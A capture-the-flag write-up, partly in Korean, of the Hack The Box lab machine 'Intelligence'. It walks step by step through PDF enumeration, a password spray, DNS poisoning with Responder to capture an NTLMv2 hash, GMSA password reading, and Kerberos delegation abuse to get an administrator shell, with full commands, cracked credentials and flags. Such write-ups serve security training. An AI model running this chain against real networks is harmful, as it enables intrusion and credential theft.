Proof of Concept
10.129.95.154
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPsslInformation Gathering
hosts 정보 수집
┌──(kali㉿kali)-[~/Intelligence]
└─$ nxc smb 10.129.95.154 --generate-hosts-file hosts
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat hosts
10.129.95.154 DC.intelligence.htb intelligence.htb DC/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.95.154 DC.intelligence.htb intelligence.htb DCInitial Access
80포트 웹서비스의 하위 디렉토리 탐색 결과, /documents 디렉토리에 pdf 파일들이 존재하는 것을 확인
┌──(kali㉿kali)-[~/Intelligence]
└─$ feroxbuster -u http://intelligence.htb -t 100 -s 200 -w /usr/share/dirb/wordlists/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://intelligence.htb/
🚩 In-Scope Url │ intelligence.htb
🚀 Threads │ 100
📖 Wordlist │ /usr/share/dirb/wordlists/common.txt
👌 Status Codes │ [200]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 209l 800w 48542c http://intelligence.htb/documents/2020-12-15-upload.pdf
200 GET 7l 1031w 84152c http://intelligence.htb/documents/bootstrap.bundle.min.js
200 GET 106l 659w 26989c http://intelligence.htb/documents/demo-image-01.jpg
200 GET 56l 165w 1850c http://intelligence.htb/documents/scripts.js
200 GET 208l 768w 47856c http://intelligence.htb/documents/2020-01-01-upload.pdf
200 GET 1l 44w 2532c http://intelligence.htb/documents/jquery.easing.min.js
200 GET 8l 29w 28898c http://intelligence.htb/documents/favicon.ico
200 GET 2l 1297w 89476c http://intelligence.htb/documents/jquery.min.js
200 GET 492l 2733w 186437c http://intelligence.htb/documents/demo-image-02.jpg
200 GET 10345l 19793w 190711c http://intelligence.htb/documents/styles.css
<SNIP>PDF 파일 Brute-force 후 내용을 출력하는 파이썬 코드 작성
import requests
import pdfplumber
import io
from datetime import date, timedelta
from concurrent.futures import ThreadPoolExecutor, as_completed
BASE_URL = "http://intelligence.htb/documents"
START_DATE = date(2018, 1, 1)
END_DATE = date(2023, 12, 31)
def check(d):
url = f"{BASE_URL}/{d.strftime('%Y-%m-%d')}-upload.pdf"
try:
r = requests.get(url, timeout=5)
if r.status_code == 200:
with pdfplumber.open(io.BytesIO(r.content)) as pdf:
text = "\n".join(page.extract_text() or "" for page in pdf.pages)
return url, text
except:
pass
dates = [START_DATE + timedelta(days=i) for i in range((END_DATE - START_DATE).days + 1)]
with ThreadPoolExecutor(max_workers=50) as ex:
for result in as_completed(ex.submit(check, d) for d in dates):
if res := result.result():
url, text = res
print(f"\n{'='*60}")
print(f"[{url}]")
print(text)파이썬 코드 실행
┌──(kali㉿kali)-[~/Intelligence]
└─$ python find_pdfs.py | tee find_pdfs_string.txt
============================================================
[http://intelligence.htb/documents/2020-01-01-upload.pdf]
Dolore ut etincidunt adipisci aliquam labore.
Dolore quaerat porro neque amet. Non ipsum quiquia ut dolor modi porro.
Magnam dolor dolor etincidunt magnam adipisci etincidunt magnam. Aliquam
eius ipsum sed amet dolorem voluptatem. Dolore tempora magnam tempora
est ipsum. Modi etincidunt consectetur porro numquam eius magnam velit.
Est consectetur non tempora velit sed labore. Velit sed labore voluptatem est
tempora. Magnam etincidunt consectetur sed dolorem amet labore.
Adipisciesteiusvoluptatem. Adipisciseddoloremutetinciduntnonetincidunt
numquam. Quisquam sit tempora voluptatem. Numquam ut dolore consecte-
tur dolor quaerat quisquam. Tempora dolorem dolore dolore etincidunt modi.
Magnamaliquamquisquamporro. Modiestutnumquamdolordoloremneque.
============================================================
[http://intelligence.htb/documents/2020-01-02-upload.pdf]
Adipisci dolor eius porro.
Voluptatem neque modi consectetur magnam sit. Eius ut sit velit quaerat. Est
labore est amet consectetur amet voluptatem etincidunt. Ut aliquam magnam
<SNIP>PDF 파일에서 기본 비밀번호 발견
- NewIntelligenceCorpUser9876
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat find_pdfs_string.txt | grep -i passw -A 5 -B 5
============================================================
[http://intelligence.htb/documents/2020-06-04-upload.pdf]
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
============================================================
[http://intelligence.htb/documents/2020-07-20-upload.pdf]
Adipisci etincidunt labore ipsum magnam numquam
ut aliquam.PDF 리스트 파일 생성
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat find_pdfs_string.txt | grep pdf | sed 's/\[//' | sed 's/\]//' > pdf_list.txtPDF 파일 전부 다운로드 하는 쉘 스크립트 작성
┌──(kali㉿kali)-[~/Intelligence/pdfs]
└─$ cat pdf_list.txt
#!/bin/bash
wget http://intelligence.htb/documents/2020-01-01-upload.pdf
wget http://intelligence.htb/documents/2020-01-02-upload.pdf
wget http://intelligence.htb/documents/2020-01-23-upload.pdf
wget http://intelligence.htb/documents/2020-02-17-upload.pdf
wget http://intelligence.htb/documents/2020-01-20-upload.pdf
wget http://intelligence.htb/documents/2020-01-22-upload.pdf
wget http://intelligence.htb/documents/2020-01-25-upload.pdf
wget http://intelligence.htb/documents/2020-02-11-upload.pdf
wget http://intelligence.htb/documents/2020-01-10-upload.pdf
<SNIP>쉘 스크립트 실행
┌──(kali㉿kali)-[~/Intelligence/pdfs]
└─$ ./pdf_list.txt
--2026-02-21 03:52:53-- http://intelligence.htb/documents/2020-01-01-upload.pdf
Resolving intelligence.htb (intelligence.htb)... 10.129.95.154
Connecting to intelligence.htb (intelligence.htb)|10.129.95.154|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26835 (26K) [application/pdf]
Saving to: ‘2020-01-01-upload.pdf’
<SNIP>다운로드 받은 PDF에서 Creator를 전부 추출하여 사용자 목록 생성
┌──(kali㉿kali)-[~/Intelligence/pdfs]
└─$ exiftool *.pdf | grep Creator | cut -d ':' -f 2 | sed 's/ //' > ../userlist.txt이전에 알아낸 비밀번호를 사용하여 Password Spray 공격 수행 결과, Tiffany.Molina 사용자로 인증 성공
- Tiffany.Molina:NewIntelligenceCorpUser9876
┌──(kali㉿kali)-[~/Intelligence]
└─$ nxc smb intelligence.htb -u userlist.txt -p 'NewIntelligenceCorpUser9876' -t 100
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.129.95.154 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
<SNIP>
SMB 10.129.95.154 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876Tiffany.Molina 사용자로 Users와 IT 공유 디렉토리에 접근 가능
┌──(kali㉿kali)-[~/Intelligence]
└─$ nxc smb intelligence.htb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --shares
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB 10.129.95.154 445 DC [*] Enumerated shares
SMB 10.129.95.154 445 DC Share Permissions Remark
SMB 10.129.95.154 445 DC ----- ----------- ------
SMB 10.129.95.154 445 DC ADMIN$ Remote Admin
SMB 10.129.95.154 445 DC C$ Default share
SMB 10.129.95.154 445 DC IPC$ READ Remote IPC
SMB 10.129.95.154 445 DC IT READ
SMB 10.129.95.154 445 DC NETLOGON READ Logon server share
SMB 10.129.95.154 445 DC SYSVOL READ Logon server share
SMB 10.129.95.154 445 DC Users READUsers 공유 디렉토리 접속
┌──(kali㉿kali)-[~/Intelligence]
└─$ smbclient //intelligence.htb/Users/ -U 'Tiffany.Molina' NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
cd
3770367 blocks of size 4096. 1451256 blocks availableUsers\Tiffany.Molina\Desktop에서 user.txt 파일 발견
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Sat Feb 21 09:33:45 2026
Read user.txt
smb: \Tiffany.Molina\Desktop\> get user.txt
ct getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ cat user.txt
56463cebe9f099423d6e3e259616b76bLateral Movement (auth as TED.GRAVES)
IT 공유 디렉토리에서 downdetector.ps1 파일 발견
┌──(kali㉿kali)-[~/Intelligence]
└─$ smbclient //intelligence.htb/IT/ -U 'Tiffany.Molina' NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1454813 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)downdetector.ps1 파일 확인 결과, 5분 간격으로 웹서비스 헬스 체크를 수행하는 것을 확인. 이때 LDAP 서비스를 사용하여 DNS 조회를 수행하는데, -UseDefaultCredentials 옵션을 사용하고 있어 공격자는 Responder를 통해 크리덴셜 탈취 가능
┌──(kali㉿kali)-[~/Intelligence]
└─$ cat downdetector.ps1
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}dnstool.py를 사용하여 가짜 DNS 레코드를 공격자 IP로 등록
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ python dnstool.py -u 'intelligence\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r webapp -a add -t A -d 10.10.14.221 DC.intelligence.htb -dc-ip 10.129.95.154 -dns-ip 10.129.95.154
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfullyResponder 실행
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
<SNIP>
[+] Current Session Variables:
Responder Machine Name [WIN-F73QDZ7CCI1]
Responder Domain Name [HMSL.LOCAL]
Responder DCE-RPC Port [48475]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...Ted.Graves NTLMv2 해시 획득
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ sudo responder -I tun0
<SNIP>
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.95.154
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:7586ed4ae64eb877:3199C431726BACA27C9AA7F94646889B:0101000000000000883A834C8FA3DC010B1E32D1E327E2CB000000000200080048004D0053004C0001001E00570049004E002D00460037003300510044005A00370043004300490031000400140048004D0053004C002E004C004F00430041004C0003003400570049004E002D00460037003300510044005A00370043004300490031002E0048004D0053004C002E004C004F00430041004C000500140048004D0053004C002E004C004F00430041004C0008003000300000000000000000000000002000002BF6BA424851E800419F386B98EC655B381F8736E3F80C09D3742377E1DA2BB30A001000000000000000000000000000000000000900380048005400540050002F007700650062006100700070002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000획득한 해시를 크랙하여 평문 비밀번호 획득
- TED.GRAVES:Mr.Teddy
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
TED.GRAVES::intelligence:7586ed4ae64eb877:3199c431726baca27c9aa7f94646889b:0101000000000000883a834c8fa3dc010b1e32d1e327e2cb000000000200080048004d0053004c0001001e00570049004e002d00460037003300510044005a00370043004300490031000400140048004d0053004c002e004c004f00430041004c0003003400570049004e002d00460037003300510044005a00370043004300490031002e0048004d0053004c002e004c004f00430041004c000500140048004d0053004c002e004c004f00430041004c0008003000300000000000000000000000002000002bf6ba424851e800419f386b98ec655b381f8736e3f80c09d3742377e1da2bb30a001000000000000000000000000000000000000900380048005400540050002f007700650062006100700070002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.TeddyTED.GRAVES 계정으로 SMB 인증 성공
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ nxc smb intelligence.htb -u 'TED.GRAVES' -p 'Mr.Teddy'
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] intelligence.htb\TED.GRAVES:Mr.TeddyLateral Movement (auth as SVC_INT$)
BloodHound 정보 수집
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ bloodhound-python -d 'intelligence.htb' -u 'TED.GRAVES' -p 'Mr.Teddy' -c All -ns 10.129.95.154 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::213
INFO: Trying LDAP connection to dead:beef::213
INFO: Testing resolved hostname connectivity dead:beef::e581:8bdc:5bee:7427
INFO: Trying LDAP connection to dead:beef::e581:8bdc:5bee:7427
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: dc.intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Testing resolved hostname connectivity dead:beef::213
INFO: Trying LDAP connection to dead:beef::213
INFO: Testing resolved hostname connectivity dead:beef::e581:8bdc:5bee:7427
INFO: Trying LDAP connection to dead:beef::e581:8bdc:5bee:7427
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 45S
INFO: Compressing output into 20260221191714_bloodhound.zipChecked BloodHound and identified user ‘TED.GRAVES’ is a member of group “ITSUPPORT”, which has “ReadGMSAPassword” rights on user “SVC_INT$”
Enumerated GMSA passwords and obtained ‘SVC_INT$’ user’s NTLM hash
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ nxc ldap intelligence.htb -u 'TED.GRAVES' -p 'Mr.Teddy' --gmsa
LDAP 10.129.95.154 389 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:intelligence.htb)
LDAPS 10.129.95.154 636 DC [+] intelligence.htb\TED.GRAVES:Mr.Teddy
LDAPS 10.129.95.154 636 DC [*] Getting GMSA Passwords
LDAPS 10.129.95.154 636 DC Account: svc_int$ NTLM: d5538dca5ba2ff329c9df39ef130f439 PrincipalsAllowedToReadPassword: ['DC$', 'itsupport']획득한 NTLM 해시로 인증 성공
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ nxc smb intelligence.htb -u 'svc_int$' -H 'd5538dca5ba2ff329c9df39ef130f439'
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] intelligence.htb\svc_int$:d5538dca5ba2ff329c9df39ef130f439Privilege Escalation
Checked BloodHound and identified that “SVC_INT$” has “AllowedToDelegate” rights on DC machine
Delegated SPN 확인
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ impacket-findDelegation -dc-ip 10.129.95.154 'intelligence.htb/Ted.Graves:Mr.Teddy'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- ---------------------------------- ----------------------- ----------
DC$ Computer Unconstrained N/A Yes
svc_int$ ms-DS-Group-Managed-Service-Account Constrained w/ Protocol Transition WWW/dc.intelligence.htb NoRequested Service Ticket
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ impacket-getST -spn 'www/dc.intelligence.htb' -impersonate 'administrator' -hashes :d5538dca5ba2ff329c9df39ef130f439 'intelligence.htb/svc_int$'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache발급받은 티켓을 사용하여 Administrator로 접속
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ export KRB5CCNAME=administrator@www_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
┌──(kali㉿kali)-[~/Intelligence/krbrelayx]
└─$ impacket-psexec -k -no-pass administrator@dc.intelligence.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file eKbtwths.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service EtXX on dc.intelligence.htb.....
[*] Starting service EtXX.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>Read root.txt
C:\Users\Administrator\Desktop> type root.txt
4543827a54c9b6561346141469382ce0
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::213
IPv6 Address. . . . . . . . . . . : dead:beef::e581:8bdc:5bee:7427
Link-local IPv6 Address . . . . . : fe80::e581:8bdc:5bee:7427%6
IPv4 Address. . . . . . . . . . . : 10.129.95.154
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%6
10.129.0.1